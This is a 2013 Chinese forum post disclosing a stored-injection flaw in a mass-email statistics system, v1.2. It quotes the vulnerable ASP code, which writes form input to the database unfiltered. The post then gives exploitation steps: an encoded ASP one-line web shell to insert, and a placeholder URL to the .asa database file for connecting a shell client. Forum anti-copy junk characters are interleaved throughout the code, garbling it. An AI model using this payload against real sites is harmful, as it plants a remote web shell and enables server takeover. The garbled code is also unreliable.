找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2096|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp , M! a$ o# E/ ?' }, t* }' N* u

9 m0 `9 i: S3 k9 `% C2 g& g: uIF Request.QueryString("Action")="del" Then $ C2 o2 v! I5 I) f/ N5 T
ID=Request.QueryString("ID")
" s* f# b  P  `) D% x2 h' _. D) fIF Countss ("tui","Fenlei",ID )<>0 then
6 k/ _- n) b+ }! B! B0 D'略 0 Y) h7 p$ t9 P& Y) W
IF Request.QueryString("Action")="Add" Then
" ?2 V6 z) i, i" T4 [2 C( K$ ?Tname=Request.Form("Typename")
. k; @- D4 A+ A: H6 r. K" a0 NSet Rs=Server.CreateObject("adodb.Recordset")
" B0 w5 L! g  K: aSql="Select * From Fenlei Order by id Desc "
$ s4 t0 h6 z" r: f5 y0 `Rs.Open Sql,Conn,1,3
9 s' P/ d, N& C/ fRs.Addnew
( ~: j3 \+ n# g, f- WRs("Typename")=Tname
, y* r" h* m, k/ Y2 Z'略   ]* |& W' k4 p1 C# G: J7 |3 Q
Set Rs=Server.CreateObject("adodb.Recordset")
7 i. o  L3 G2 W, p) hSql="Select * From Fenlei Order by id Desc "
/ z6 v# _% t) b2 fRs.Open Sql,Conn,1,1 ) U& K4 }) v" t) }, n: v& K& _
'略
4 ?4 s8 _& C1 A9 i%>
* m7 W! C  M' M) ]+ X" s; @& a! j( L 4 x) T' q9 f6 H8 E

$ j: s) z9 ]9 y% f9 D
0 C- ]) ~) p7 O( t, N没有过滤,直接写入数据库。" _" r" h6 s" S, Y

' u4 ]  A% }; j7 P利用方法:# y% R5 O! q3 r/ v9 r  C

% L4 A+ R# S( v+ _插入:┼攠數畣整爠煥敵瑳∨≡┩># A  @* X/ S  C% a" y. V- R

! o7 A* K: K1 J* M+ t: f1 ~5 T 3 ~) I4 O' Y4 G. ]% D6 P3 j7 N. H
连接: http://www.xxx.com/###tongbaner.asa 5 n5 ?, I  i0 R2 W6 }4 f
'默认安装文件:
; u* j3 s5 c6 x2 |+ p$ ~+ L'install.asp
* e& P7 @0 P$ C# X- L) H  F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表